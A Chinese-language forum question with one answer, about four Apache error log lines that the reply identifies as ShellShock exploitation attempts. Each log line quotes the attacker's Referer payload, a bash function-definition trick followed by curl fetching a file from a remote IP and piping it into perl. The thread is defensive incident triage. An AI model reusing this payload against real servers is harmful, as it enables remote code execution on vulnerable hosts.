我在我的 Apache 日志中发现了一些奇怪的 HTTP 请求,但我不确定是否应该关注它们?
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bizdb1-search.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bigconf.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bbs_forum.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/BBS, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
有任何想法吗?
答案1
这是 ShellShock,bash 漏洞攻击/利用。更多详细信息以及如何检查您是否存在漏洞,请参见此处的示例:http://dshield.org/diary.html?date=2014-09-25。